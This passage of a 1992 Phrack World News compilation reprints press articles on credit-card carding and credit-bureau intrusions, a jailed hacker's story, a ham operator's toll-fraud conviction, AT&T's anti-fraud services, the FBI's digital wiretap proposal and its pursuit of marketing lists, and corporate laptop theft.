put enough time and energy into protecting yourself, you'll never get caught,"
he said. For instance, an expert carder knows how to check his own phone line
to see if the telephone company is monitoring it, he claimed. By changing the
location of a delivery at the last minute, he said carders have evaded capture.

J J FLASH said that while most carders buy computers and equipment for
themselves, many buy televisions, videocassette recorders and other goods that
are easy to sell. "You can usually line up a buyer before its done," he said.
"If you have a $600 TV and you're selling it for $200, you will find a buyer."

He said that while TRW has tightened up security during the past year, Equifax
was still an easy target.

But John Ford, an Equifax spokesman, said he believes that hackers greatly
exaggerate their exploits. He said that in the recent San Diego case, only 12
records were accessed. "It seems to me the notion that anybody who has a PC
and a modem can sit down and break in to a system is patently untrue," he said.
"We don't have any evidence that suggests this is a frequent daily occurrence."

Regardless, Ford said his company is taking additional steps to minimize the
risk of intrusion. "If one is successful in breaking into the system, then we
are instituting some procedures that would render the information that the
hacker receives virtually useless."

Also, by frequently altering customers' passwords, truncating account


information so that entire credit-card numbers were not displayed, and possibly
encrypting other information, the system will become more secure.

"We take very seriously our responsibility to be the stewards of consumer


information," Ford said.

But others say that the credit bureaus aren't doing enough. Craig Neidorf,
publisher of Phrack, an underground electronic publication "geared to computer
and telecommunications enthusiasts," said that hacking into credit bureaus has
been going on, and has been easy to do "as long as I've been around." Neidorf
said that although he doesn't do it, associates tell him that hacking into
credit bureau's is "child's play" -- something the credit bureaus have been
careless about.

"For them not to take some basic security steps to my mind makes them
negligent," Neidorf said. "Sure you can go ahead and have the kids arrested
and yell at them, but why isn't Equifax or any of the other credit bureaus not
stopping the crime from happening in the first place? It's obvious to me that
whatever they're doing probably isn't enough."

A Recent History Of Carding

September 6, 1991: An 18-year-old American emigre, living in Israel, was


arrested there for entering military, bank and credit bureau computers. Police
said he distributed credit-card numbers to hackers in Canada and the United
States who used them to make unknown amounts of cash withdrawals.

January 13, 1992: Four university students in San Luis Obispo, California,
were arrested after charging $250,000 in merchandise to Mastercard and Visa
accounts. The computer intruders got access to some 1,600 credit-card
accounts, and used the numbers to buy, among other things: Four pairs of $130
sneakers; a $3,500 stereo; two gas barbecues and a $3,000 day at Disneyland.

February 13, 1992: Two teenagers were arrested when one of them went to pick
up two computer systems in Bellevue, Wash., using stolen credit-card numbers.
One told police that another associate had hacked into the computer system of a
mail-order house and circulated a list of 14,000 credit-card numbers through a
bulletin board.

April 17, 1992: Acting on a tip from San Diego police, two teenagers in Ohio
were arrested in connection with an investigation into a nationwide computer
hacking scheme involving credit-card fraud. Police allege "as many as a
thousand hackers" have been sharing information for four years on how to use
their computers to tap into credit bureau databases. Equifax, a credit bureau
that was penetrated, admits that a dozen records were accessed.

April 22, 1992: Two Queens teens were arrested for carding computer equipment.
_______________________________________________________________________________

Invading Your Privacy May 24, 1992


~~~~~~~~~~~~~~~~~~~~~
By Rob Johnson (The Atlanta Journal and Constitution)(Page A9)

Some do it for fun, others have more criminal intent. Regardless, computer
users have a range of techniques and weaponry when breaking into files.
"Rooting" forbidden files is hog heaven for hackers

Within an instant, he was in.

Voodoo Child, a 20-year-old college student with a stylish haircut and a well-
worn computer, had been cruising a massive researchers' network called Internet
when he stumbled upon a member account he hadn't explored for a while.

The institution performed "Star Wars" research, he later found out, but that
didn't interest him. "I don't know or care anything about physics," he said
recently. "I just wanted to get root."

And "getting root," hackers say, means accessing the very soul of a computer
system.

Working through the network, he started a program within the research


institute's computers, hoping to interrupt it at the right moment. "I figured
I just had a second," he said, gesturing with fingers arched above an imaginary
keyboard. Suddenly he pounced on the phantom keys. "And it worked."

He soon convinced the computer he was a system operator, and he built himself a
back door to Internet: He had private access to exotic supercomputers and
operating systems around the world.

Before long, though, the Atlanta-area hacker was caught, foiled by an MCI
investigator following his exploits over the long-distance phone lines.
National security experts sweated over a possible breach of top-secret
research; the investigation is continuing.

And Voodoo Child lost his computer to law enforcement.

"I was spending so much time on the computer, I failed out of college," he
said. "I would hack all night in my room, go to bed and get up at 4 in the
afternoon and start all over."

In college, he and a friend were once discovered by campus police dumpster-


diving behind the university computer building, searching for any scraps of
paper that might divulge an account number or a password that might help them
crack a computer.

Now he's sweating it out while waiting for federal agents to review his case.
"I'm cooperating fully," he said. "I don't want to go to prison. I'll do
whatever they want me to."

In the meantime, he's back in college and has taken up some art projects he'd
abandoned for the thrill of computer hacking.

The free-form days of computer hacking have definitely soured a bit -- even for
those who haven't been caught by the law.

"It's a lot more vicious," Voodoo Child said as a friend nodded in agreement.
"Card kids" -- young hackers who ferret out strangers' credit card numbers and
calling card accounts -- are wrecking the loose communal ethic that defined
hacking's earlier, friendlier days.

And other computer network users, he said, are terrified of the tactics of
sophisticated hackers who routinely attack other computer users' intelligence,
reputation and data.

"I used to run a BBS [electronic bulletin board system] for people who wanted
to learn about hacking," Voodoo Child said. "But I never posted anything
illegal. It was just for people who had questions, who wanted to do it
properly."

Doing it properly, several Atlanta-area hackers say, means exploring the gaps
in computer networks and corporate systems. They say it's an intellectual
exercise -- and an outright thrill -- to sneak into someone else's computer.

During a recent interview, Voodoo Child and a friend with a valid Internet
account dialed up the giant network, where some of their counterparts were
waiting for a reporter to ask them some questions.

"Did you get that information on the Atlanta Constitution reporter you were
asking about?" a faceless stranger asked.

A startled reporter saw his credit report and credit card numbers flashed
across the screen. Voodoo Child offered up the keyboard -- an introduction of
sorts to a mysterious, intimidating accomplice from deep inside the digital
otherworld. "Go ahead," he said. "Ask him anything you want."
_______________________________________________________________________________

KV4FZ: Guilty Of Telephone Toll Fraud May 15, 1992


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By John Rice (rice@ttd.teradyne.com) in TELECOM Digest V12 #412

St. Croix ham operator, Herbert L. "Herb" Schoenbohm, KV4FZ, has been found
guilty in federal court of knowingly defrauding a Virgin Islands long-distance
telephone service reseller. He was convicted April 24th of possessing and
using up to fifteen unauthorized telephone access devices in interstate and
foreign commerce nearly five years ago.
The stolen long distance telephone access codes belonged to the Caribbean
Automated Long Lines Service, Inc. (CALLS) of St. Thomas, U.S. Virgin Islands.
Schoenbohm was found to have made more than $1,000 in unauthorized telephone
calls -- although the prosecution said he was responsible for far more.

According to the Virgin Islands Daily News, Schoenbohm, who is also the St.
Croix Police Chief of Communications, showed no emotion when he was pronounced
guilty of the charges by a 12 member jury in U.S District Court in
Christiansted. The case was heard by visiting District Judge Anne Thompson.

Neither Schoenbohm or his defense attorney, Julio Brady, would comment on the
verdict. The jury deliberated about seven hours. The sentencing, which has
been set for June 26, 1992, will be handled by another visiting judge not
familiar with the case.

Schoenbohm, who is Vice Chairman of the V.I. Republican Committee, has been
released pending sentencing although his bail was increased from $5,000 to
$25,000. While he could receive a maximum of ten years on each count,
Assistant U.S. Attorney Alphonse Andrews said Schoenbohm probably will spend no
more than eight months in prison since all three counts are similar and will be
merged.

Much of the evidence on the four day trial involved people who received
unauthorized telephone calls from KV4FZ during a 1987 period recorded by the
CALLS computer. Since the incident took place more than five years ago, many
could not pinpoint the exact date of the telephone calls.

The prosecution produced 20 witnesses from various U.S locations, including


agents from the Secret Service, the U.S. Marshals Service, Treasury Department
and Federal Communications Commission. In addition ham operators testified for
the prosecution.

Schoenbohm was portrayed as a criminal who had defrauded calls out of hundreds
of thousands of dollars. Schoenbohm admitted using the service as a paying
customer, said it did not work and that he terminated the service and never
used it again. He feels that there was much political pressure to get him
tried and convicted since he had been writing unfavorably articles about
Representative DeLugo, a non-voting delegate to Congress from the Virgin
Islands, including his writing of 106 bad checks during the recent rubbergate
scandal.

Most, but not all the ham operators in attendance were totally opposed to
KV4FZ. Bob Sherrin, W4ASX from Miami attended the trial as a defense character
witness. Sherrin told us that he felt the conviction would be overturned on
appeal and that Schoenbohm got a raw deal. "They actually only proved that he
made $50 in unauthorized calls but the jury was made to believe it was $1,000."

Schoenbohm's attorney asked for a continuance due to newly discovered evidence,


but that was denied. There also is a question as to whether the jury could
even understand the technology involved. "Even his own lawyer couldn't
understand it, and prepared an inept case," Sherrin said. "I think he was
railroaded. They were out to get him. There were a lot of ham net members
there and they were all anti-Herb Schoenbohm. The only people that appeared
normal and neutral were the FCC. The trial probably cost them a million
dollars. All his enemies joined to bring home this verdict."

Schoenbohm had been suspended with pay from the police department job since
being indicted by the St. Croix grand jury. His status will be changed to
suspension without pay if there is an appeal. Termination will be automatic if
the conviction is upheld. Schoenbohm's wife was recently laid off from her job
at Pan Am when the airline closed down. Financially, it could be very
difficult for KV4FZ to organize an appeal with no money coming in.

The day after the KV4FZ conviction, Schoenbohm who is the Republican Committee
vice chairman was strangely named at a territorial convention as one of eight
delegates to attend the GOP national convention in Houston this August. He was
nominated at the caucus even though his felony conviction was known to
everyone. Schoenbohm had even withdrawn his name from consideration since he
was now a convicted felon.

The Virgin Island Daily News later reported that Schoenbohm will not be
attending the GOP national convention. "Schoenbohm said he came to the
conclusion that my remaining energies must be spent in putting my life back
together and doing what I can to restore my reputation. I also felt that any
publicity in association with my selection may be used by critics against the
positive efforts of the Virgin Islands delegation."

Schoenbohm has been very controversial and vocal on the ham bands. Some ham
operators now want his amateur radio license pulled -- and have made certain
that the Commission is very much aware of his conviction.
_______________________________________________________________________________

AT&T Launches Program To Combat Long-Distance Theft May 13, 1992


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Virginia Randall (United Press International/UPI)

Citing the mushrooming cost of long-distance telephone fraud, American


Telephone & Telegraph Co. announced plans to combat theft of long-distance
telephone services from customers.

AT&T's program, dubbed NetProtect, is an array of software, consulting,


customer education and monitoring services for businesses. One program limits
customer liability to the first $25,000 of theft, while another ends customer
liability entirely under certain circumstances.

By law, companies are liable for the cost of calls made on their systems,
authorized or not.

Jerre Stead, president of AT&T's Business Communications unit, said, "The


program not only offers financial relief to victims of long-distance fraud.
It also gives our customers new products and services specifically designed to
prevent and detect fraud."

Long-distance calling fraud ranges from a few dollars to the hundreds of


thousands of dollars for victims. The Communications Fraud Control
Association, an industry group, estimates long-distance calling fraud costs
more than $1 billion a year, said Peggy Snyder, an association spokeswoman.

NetProtect Basic Service, offered free with long-distance and domestic 800
service, consists of ongoing monitoring around the clock for unusual activity.

The company will start this service this week.

NetProtect Enhanced and Premium services offer more customized monitoring and
limit customer liability to $25,000 per incident or none at all, depending on
the program selected.
Pricing and permission to provide the Enhanced and Premium services are
dependent on Federal Communication Commission approval. AT&T expects to offer
these programs beginning August 1.

Other offerings are a $1,995 computer software package called "Hacker Tracker,"
consulting services and the AT&T Fraud Intervention Service, a swat team of
specialists who will detect and stop fraud while it is in progress.

The company also will provide a Security Audit Service that will consult with
customers on possible security risks. Pricing will be calculated on a case-by-
case basis, depending on complexity.

The least expensive option for customers is AT&T's Security Handbook and
Training, a self-paced publication available for $65 which trains users on
security features for AT&T's PBX, or private branch exchanges, and voice mail
systems.

Fraud occurs through PBX systems, which are used to direct the external
telephone calls of a business.

Company employees use access codes and passwords to gain entry to their PBX
system. A typical use, the industry fraud group's Snyder said, would be a
sales force on the road calling into their home offices for an open line to
call other customers nationally or worldwide.

These access codes can be stolen and used to send international calls through
the company's network, billable to the company.

Unauthorized access to PBXs occur when thieves use an automatic dialing feature
in home computers to dial hundreds of combinations of phone numbers until they
gain access to a company's PBX system.

These thieves, also known as hackers, phone freaks or phrackers, then make
their own calls through the PBX system or sell the number to a third party to
make calls.

Others use automatic dialing to break into PBX systems through voice mail
systems because such systems have remote access features.

Calls from cellular phones also are at risk if they are remotely accessed to a
PBX. Electronic mail systems for intracompany calls are not affected because
they don't require PBX systems.

According to Bob Neresian of AT&T, most fraud involves long-distance calls to


certain South American and Asian countries, especially Columbia and Pakistan.

There is no profile of a typical company at risk for telephone fraud, said


Snyder.

"Any company of any size with long-distance service is at risk," she said.
"Criminals don't care who the long distance provider is or how big the company
they're stealing from is."

She said the industry recognized the dimensions of telephone theft in 1985,
when the Communications Fraud Control Association was formed in Washington D.C.
The group consists of providers of long-distance service, operator services,
private payphones, end-users of PBX systems, federal, state and local law
enforcement agencies and prosecutors.

Janice Langley, a spokeswoman for US Sprint Corp. in Kansas City, Mo., called
AT&T's announcement similar to a program her company announced March 31.

That service, SprintGuard Plus, is available to companies with a call volume


of $30,000 a month. Sprint also offers basic monitoring program to customers
without charge.

"We don't have minimum billing requirements for any of these services or
systems," responded AT&T's Neresian. "All the carriers have seen the problem
and have been working on their own approaches," he said.

Jim Collins, a spokesman for MCI Communications in Washington, said his company
had been conducting phone fraud workshops free of charge for customers for four
years.
_______________________________________________________________________________

==Phrack Inc.==

Volume Four, Issue Thirty-Nine, File 12 of 13

PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
PWN PWN
PWN Phrack World News PWN
PWN PWN
PWN Issue XXXIX / Part Three of Four PWN
PWN PWN
PWN Compiled by Datastream Cowboy PWN
PWN PWN
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN

New Phones Stymie FBI Wiretaps April 29, 1992


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Simson L. Garfinkel (Christian Science Monitor)(Page 12)

"Legislation proposed by Justice Department would change the way


telecommunications equipment is developed in the United States."

For more than 50 years, wiretapping a telephone has been no more difficult than
attaching two clips to a telephone line. Although legal wiretaps in the United
States have always required the approval of a judge or magistrate, the actual
wiretap has never been a technical problem. Now that is changing, thanks to
the same revolution in communications that has made car phones, picture
telephones, and fax machines possible.

The only thing a person tapping a digital telephone would hear is the
indecipherable hiss and pop of digital bits streaming past. Cellular
telephones and fiber-optic communications systems present a would-be wiretapper
with an even more difficult task: There isn't any wire to tap.

Although cellular radio calls can be readily listened in on with hand-held


scanners, it is nearly impossible to pick up a particular conversation -- or
monitor a particular telephone -- without direct access to the cellular
telephone "switch," which is responsible for connecting the radio telephones
with the conventional telephone network.
This spring, the Federal Bureau of Investigation (FBI) unveiled legislation
that would require telephone companies to include provisions in their equipment
for conducting court-ordered wiretaps. But critics of the legislation,
including some members of Congress, claim that the proposals would expand the
FBI's wiretap authority and place an undue burden on the telecommunications
industry.

Both sides agree that if provisions for monitoring communications are not made
in the planning stages of new equipment, it may eventually become impossible
for law enforcement personnel to conduct wiretaps.

"If the technology is not fixed in the future, I could bring an order [for a
wiretap] to the telephone company, and because the technology wasn't designed
with our requirement in mind, that person could not [comply with the court
order]," says James K. Kalstrom, the FBI's chief of engineering.

The proposed legislation would require the Federal Communications Commission


(FCC) to establish standards and features for makers of all electronic
communications systems to put into their equipment, require modification of all
existing equipment within 180 days, and prohibit the sale or use of any
equipment in the US that did not comply. The fine for violating the law would
be $10,000 per day.

"The FBI proposal is unprecedented," says Representative Don Edwards (D) of


California, chairman of the House Judiciary Subcommittee on Civil and
Constitutional Rights and an outspoken critic of the proposal. "It would give
the government a role in the design and manufacture of all telecommunications
equipment and services."

Equally unprecedented, says Congressman Edwards, is the legislation's breadth:


The law would cover every form of electronic communications, including cellular
telephones, fiber optics, satellite, microwave, and wires. It would cover
electronic mail systems, fax machines, and all networked computer systems. It
would also cover all private telephone exchanges -- including virtually every
office telephone system in the country.

Many civil liberties advocates worry that if the ability to wiretap is


specifically built into every phone system, there will be instances of its
abuse by unauthorized parties.

Early this year, FBI director William Sessions and Attorney General William
Barr met with Senator Ernest F. Hollings (D) of South Carolina, chairman of the
Senate Commerce Committee, and stressed the importance of the proposal for law
enforcement.

Modifying the nation's communications systems won't come cheaply. Although


the cost of modifying existing phone systems could be as much as $300 million,
"We need to think of the costs if we fail to enact this legislation," said Mr.
Sessions before a meeting of the Commerce, Justice, State, and Judiciary
Subcommittees in April. The legislation would pass the $300 million price-tag
along to telephone subscribers, at an estimated cost of 20 cents per line.

But an ad-hoc industry coalition of electronic communications and computer


companies has objected not only to the cost, but also to the substance of the
FBI's proposal. In addition, they say that FCC licensing of new technology
would impede its development and hinder competitiveness abroad.
Earlier this month, a group of 25 trade associations and major companies,
including AT&T, GTE, and IBM, sent a letter to Senator Hollings saying that "no
legislative solution is necessary." Instead, the companies expressed their
willingness to cooperate with the FBI's needs.

FBI officials insist that legislation is necessary. "If we just depend on


jaw-boning and waving the flag, there will be pockets, areas, certain places"
where technology prevents law enforcement from making a tap, says Mr. Kalstrom,
the FBI engineer. "Unless it is mandatory, people will not cooperate."

For example, Kalstrom says, today's cellular telephone systems were not built
with the needs of law enforcement in mind. "Some companies have modified their
equipment and we can conduct surveillance," he says. But half of the companies
in the US haven't, he adds.

Jo-Anne Basile, director of federal relations for the Cellular


Telecommunications Industry Association here in Washington, D.C., disagrees.

"There have been problems in some of the big cities because of [limited]
capacity," Ms. Basile says. For example, in some cities, cellular operators
had to comply with requests for wiretaps by using limited "ports" designed for
equipment servicing. Equipment now being installed, though, has greatly
expanded wiretap capacity in those areas.

"We believe that legislation is not necessary because we have cooperated in


the past, and we intend on cooperating in the future," she adds.

The real danger of the FBI's proposal is that the wiretap provisions built in
for use by the FBI could be subverted and used by domestic criminals or
commercial spies from foreign countries, says Jerry Berman, director of the
Electronic Frontier Foundation, a computer users' protection group in
Cambridge, Mass.

"Anytime there is a hearing on computer hackers, computer security, or


intrusion into AT&T, there is a discussion that these companies are not doing
enough for security. Now here is a whole proposal saying, 'Let's make our
computers more vulnerable.' If you make it more vulnerable for the Bureau,
don't you make it more vulnerable for the computer thief?"

Civil liberties advocates also worry that making wiretaps easier will have the
effect of encouraging their use -- something that the FBI vehemently denies.

"Doing a wiretap has nothing to do with the [technical] ease," says Kalstrom.
"It is a long legal process that we must meet trying all other investigations
before we can petition the court."

Kalstrom points out the relative ease of doing a wiretap with today's telephone
system, then cites the federal "Wiretap Report," which states that there were
only 872 court-approved wiretaps nationwide in 1990. "Ease is not the issue.
There is a great dedication of manpower and cost," he says. But digital
wiretapping has the potential for drastically lowering the personnel
requirements and costs associated with this form of electronic surveillance.
Computers could listen to the phone calls, sitting a 24-hour vigil at a low
cost compared with the salary of a flesh-and-blood investigator.

"Now we are seeing the development of more effective voice-recognition


systems," says Edwards. "Put voice recognition together with remote-access
monitoring, and the implications are bracing, to say the least."
Indeed, it seems that the only thing both sides agree on is that digital
telephone systems will mean more secure communications for everybody.

"It is extremely easy today to do a wiretap: Anybody with a little bit of


knowledge can climb a telephone poll today and wiretap someone's lines," says
Kalstrom. "When the digital network goes end-to-end digital, that will
preclude amateur night. It's a much safer network from the privacy point of
view."

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

FBI Fight With Computer, Phone Firms Intensifies May 4, 1992


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Taken from Los Angeles Times (Business, Part D, Page 2)

"Spy Agencies Oppose Technology That Will Prevent


Them From Tapping Into Data And Conversations"

Top computer and telecommunications executives are fighting attempts by the FBI
and the nation's intelligence community to ensure that government surveillance
agencies can continue to tap into personal and business communications lines as
new technology is introduced.

The debate flared last week at a House Judiciary Committee hearing on foreign
intelligence agencies' attempts to gather U.S. companies' secrets. The
committee's chairman, Representative Jack Brooks (D-Tex.), called the hearing
to complain that the FBI and the National Security Agency (NSA) are hurting
companies' attempts to protect their communications.

The issue has been heating up on two fronts. Phone companies have been
installing digital equipment that frustrates phone tapping efforts, and
computer companies are introducing new methods of securing data transmissions
that are almost impossible for intelligence agencies to penetrate.

The controversy centers, in part, on an FBI attempt to persuade Congress to


force telephone companies to alter their digital networks, at a possible cost
of billions of dollars that could be passed on to ratepayers, so that the FBI
can continue performing court-authorized wiretaps. Digital technology
temporarily converts conversations into computerized code, which is sent at
high speed over transmission lines and turned back to voice at the other end,
for efficient transmission.

Civil liberties groups and telecommunications companies are fiercely resisting


the FBI proposal, saying it will stall installation of crucial technology and
negate a major benefit of digital technology: Greater phone security. The
critics say the FBI plan would make it easier for criminals, terrorists,
foreign spies and computer hackers to penetrate the phone network. The FBI
denies these and other industry assertions.

Meanwhile, the NSA, the nation's super-secret eavesdropping agency, is trying


to ensure that government computers use a computer security technology that
many congressmen and corporate executives believe is second-rate, so that NSA
can continue monitoring overseas computer data transmissions. Corporations
likely would adopt the government standard.

Many corporate executives and congressmen believe that a branch of the Commerce
Department that works closely with NSA, the National Institute of Standards and
Technology (NIST), soon will endorse as the government standard a computer-
security technology that two New Jersey scientists said they penetrated to
demonstrate its weakness. NIST officials said that their technology wasn't
compromised and that it is virtually unbreakable.

"In industry's quest to provide security (for phones and computers), we have a
new adversary, the Justice Department," said D. James Bidzos, president of
California-based RSA Data Security Inc., which has developed a computer-
security technology favored by many firms over NIST's. "It's like saying that
we shouldn't build cars because criminals will use them to get away."

"What's good for the American company may be bad for the FBI" and NSA, said
Representative Hamilton Fish Jr. (R-N.Y.). "It is a very heavy issue here."

The situation is a far cry from the 1950s and 1960s, when companies like
International Business Machines Corporation and AT&T worked closely with law-
enforcement and intelligence agencies on sensitive projects out of a sense of
patriotism. The emergence of a post-Vietnam generation of executives,
especially in new high-technology firms with roots in the counterculture, has
short-circuited the once-cozy connection, industry and government officials
said.

"I don't look at (the FBI proposal) as impeding technology," FBI Director
William S. Sessions testified at the Judiciary Committee hearing. "There is a
burden on the private sector . . . a price of doing business."

FBI officials said they have not yet fumbled a criminal probe due to inability
to tap a phone, but they fear that time is close. "It's absolutely essential
we not be hampered," Sessions said. "We cannot carry out our responsibilities"
if phone lines are made too secure.

On the related computer-security issue, the tight-lipped NSA has never


commented on assertions that it opposes computerized data encryption
technologies like that of RSA Data Security because such systems are
uncrackable.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

For more articles on this same topic, please see:

Phrack 38, File 11; The Digital Telephony Proposal.


_______________________________________________________________________________

FBI Seeks Compiled Lists For Use In Its Field Investigation April 20, 1992
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Ray Schultz (DMNews)(Page 1)
Special Thanks: The Omega and White Knight

Washington, D.C. -- The Federal Bureau of Investigation, in a move that could


spell trouble for the industry, reported is seeking commercial mailing lists
for use in its investigations.

Spokespersons for both MetroMail Corporation and Donnelley Marketing confirmed


that they were approached for services within the last two weeks and other
firms also received feelers.

Neither of the identified firms would discuss details, but one source familiar
with the effort said the FBI apparently is seeking access to a compiled
consumer database for investigatory uses.

The FBI agents showed "detailed awareness" of the products they were seeking,
and claimed to have already worked with several mailing list companies,
according to the source.

Metromail, which has been supplying the FBI with its MetroNet address lookup
service for two years, did not confirm this version of events. Spokesperson
John Tomkiw said only that the firm was asked by the FBI about a "broadening"
of its services.

The firm has supplied the bureau with a full listing of its products and
services, but has not yet been contacted back and is not sure what action it
will take, said Tomkiw.

Donnelley was also vague on the specifics of the approach, but did say it has
declined any FBI business on the grounds that it would be an inappropriate use
of its lists.

FBI spokesperson Bill Carter was unable to provide confirmation, although he


did verify that the FBI uses MetroNet to locate individuals needed for
interviews.

If the database scenario is true, it would mark the first major effort by a
government agency to use mailing lists for enforcement since the Internal
Revenue Service tried to use rented lists to catch tax cheats in 1984.

"We have heard of it," said Robert Sherman, counsel to the Direct Marketing
Association and attorney with the firm of Milgrim Thomajan & Lee, New York.
"We'd like to know more about it. If it is what it appears to be, law
enforcement agents attempting to use marketing lists for law enforcement
purposes, then the DMA and industry would certainly be opposed to that on
general principles."

Such usage would "undermine consumer confidence in the entire marketing process
and would intrude on what otherwise would be harmless collection of data,"
Sherman said.

RL Polk, which has not been contacted, said it would decline for the same
reasons if approached.

"That's not a proper use of our lists," said Polk chairman John O'Hara. "We're
in the direct mail business and it's our policy not to let our lists be used
for anything but marketing purposes."

According to one source, who requested anonymity, the FBI intimated that it
would use its subpoena power if refused access to the lists.

The approaches, made through the FBI training center in Quantico, VA,
reportedly were not the first.

The FBI's Carter said the MetroNet product was used for address lookups only.

"If a field office needs to locate somebody for an interview, we can check the
[MetroNet] database as to where they reside and provide that information to the
field office," he said.

However, the product was cited as a potential threat to privacy last year by
Richard Kessel, New York State Consumer Affairs Commissioner.

In a statement on automatic number identifiers, Kessel's office said that "one


firm offers to provide 800-number subscribers immediate access to information
on 117-million customers in 83-million households nationwide.

"The firm advertises that by matching the number of an incoming call into its
database, and an 800 subscriber within seconds can find out such information as
whether the caller has previously purchased items from their companies."

Kessel included a copy of a trade ad for MetroNet, in which the product is


presented as a direct marketing tool.

Under the headline "Who am I?" the copy reads as if it is by an imaginary


consumer.

"The first step to knowing me better is as easy as retrieving my phone number


in an Automatic Number Identification environment," it says. "Within seconds
you can search your internal database to see if I've purchased from you before.
And if it's not to be found, there's only one place to go -- to MetroNet.

"MetroNet gives you immediate access to information on 117-million consumers in


83-million households nationwide: recent addresses; phone numbers; specific
demographics and household information."

Tomkiw defended the product, saying its primary focus is "direct marketing.
We're always sensitive to those types of issues."

MetroNet works as an electronic white pages, but does not contain "a lot of
demograhpic data," he said. "It's primarily used by the real estate and
insurance industries."

The 1984 IRS effort reportedly was a failure, but it created a public outcry
and much negative publicity for the industry. Though Polk, MetroMail and
Donnelley all refused to rent their lists for the effort, the IRS was able to
locate other lists through Dunhill of Washington. Most industry sources say
that such efforts are doomed to fail because lists are useful only in
identifying people in aggregate, not as individuals."
_______________________________________________________________________________

Do You Know Where Your Laptop Is? May 11, 1992


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Robert Kelly (InformationWeek)

Are your executives carrying computers with critical data?


If so, company secrets are vulnerable

It was an expensive round of window shopping. On December 17, 1990, David


Farquhar parked his car in downtown London to browse through an automobile
showroom. A Wing Commander in Great Britain's Royal Air Force, he was enjoying
a few moments away from the mounting pressures leading up to the Gulf War,
which would begin less than a month later.

But Farquhar made a huge mistake: He left his laptop computer in his car. And
although he was gone a mere five minutes, by the time he returned, the laptop
had been stolen -- as had U.S. General Norman Schwarzkopf's plans, stored in
the computer's disk drive, for the upcoming Allied strike against Iraq.
Farquhar paid dearly for his carelessness. Soon after the red-faced Wing
Commander reported the incident, he was court-martialed, demoted, and slapped
with a substantial fine. The computer was anonymously returned a week later-
with the disk drive intact.

Farquhar may feel alone in his dilemma and rue the wrong turn his life has
taken, but such episodes are anything but isolated. Though electronic security
sources say it's too soon to keep score yet on the exact number of laptop
thefts, anecdotally, at least, it appears a computer crime wave is underway.
According to electronic data experts, during the past 18 months, as laptop
purchases have soared, theft has taken off also.

For instance, at the Computer Security Institute (CSI), an organization that


ironically comprises corporate security experts, a half-dozen members have
already reported their company laptops stolen, says Phil Chapnick, director of
the San Francisco-based group. And there are probably more that aren't
speaking about it, he adds: "Victims prefer to maintain a low profile."

So do the perpetrators, obviously. But a picture of who some of them are is


beginning to emerge, says John Schey, a security consultant for the federal
government. He says a roving band of "computer hit men" from New York, Los
Angeles, and San Francisco has been uncovered; members are being paid upwards
of $10,000 to steal portable computers and strategic data stored on those
machines from executives at Fortune 1,000 companies. Federal agents, Schey
adds, are conducting a "very, very dynamic and highly energized investigation
to apprehend the group." U.S. law enforcement authorities refuse to comment on
the issue.

Laptop theft is not, of course, limited to the United States. According to


news reports, and independently confirmed by InformationWeek, visiting
executives from NCR Corp. learned that reality the hard way recently when they
returned to their rooms after dinner at the Nikko Hotel in Paris to find the
doors removed from their hinges. The rooms were ransacked, turned upside down,
but the thieves found what they were looking for. All that was taken were two
laptops containing valuable corporate secrets.

Paul Joyal, president of Silver Spring, Maryland, security firm Integer and a
former director of security for the Senate Intelligence Committee, says he
learned from insiders close to the incident that French intelligence agents,
who are known for being chummy with domestic corporations, stole the machines.
Joyal suspects they were working for a local high-tech company. An NCR
spokesman denies knowledge of the incident, but adds that "with 50,000
employees, it would be impossible to confirm." Similar thefts, sources say,
have occurred in Japan, Iraq, and Libya.

It's not hard to figure out why laptop theft is on the rise. Unit sales of
laptops are growing 40% annually, according to market researchers Dataquest
Inc., and more than 1 million of them enter the technology stream each year.
Most of the machines are used by major companies for critical tasks, such as
keeping the top brass in touch when they're on the road, spicing up sales calls
with real data pulled from the corporate mainframe, and entering field data
into central computers. Because of laptops, says Dan Speers, an independent
data analyst in West Paterson, New Jersey, "there's a lot of competitive data
floating around."

And a perfect way to steal information from central corporate databases.


Thieves are not only taking laptops to get at the data stored in the disk
drives, but also to dial into company mainframes. And sometimes these thieves
are people the victims would least suspect. One security expert tells of "the
wife of a salesman for a Fortune 500 manufacturing firm who worked for a direct
competitor." While her husband slept, she used his laptop to log on to a
mainframe at his company and download confidential sales data and profiles of
current and potential customers. "The husband's job," says the security
expert, "not the wife's, was terminated."

Such stories, and there are plenty of them, have led many U.S. companies to
give lip service to laptop theft, but in almost all cases they're not doing
much about it. "Management has little or no conception of the vulnerability of
their systems," says Winn Schwartau, executive director of InterPact, an
information security company in Nashville. That's not surprising, adds CSI's
Chapnick: "Security typically lags technology by a couple of years."

Playing Catch-Up

Still, some companies are trying to catch up quickly. Boeing Corp., Grumman
Corp., and Martin Marietta Corp., among others, have adopted strict policies on
portable data security. This includes training staffers on laptop safety
rules, and even debriefing them when they return from a trip. One company,
sources say, was able to use such a skull session to identify a European hotel
as a threat to data security, and put it on the restricted list for future
trips.

Conde Nast Publications Inc. is taking the the issue even more seriously. The
New York-based magazine group's 65-member sales force uses laptops to first
canvas wholesalers, then upload data on newsstand sales and distribution
problems to the central mainframe. To ensure that the corporate database isn't
poisoned by rogue data, "we have a very tight security system," says Chester
Faye, Conde Nast's director of data processing. That system's centerpiece is a
program, created in-house at Conde Nast, that lets the mainframe read an
identification code off of the chip of each laptop trying to communicate with
it. "The mainframe, then, can hang up on laptops with chip IDs it doesn't
recognize and on those reported stolen by sales reps," says Faye.

And some organizations hope to go to even greater lengths. InterPact's


Schwartau says a government agency in Great Britain wants to build a device
that attaches to a user's belt and disconnects communication to a mainframe
when the laptop deviates 15 degrees vertically. The reason: To protect
corporate data if the person using the laptop is shot and killed while dialing
in.

Users say they're taking such extreme measures because the vendors don't; most
laptops arrive from the factory without adequate security protection. Most
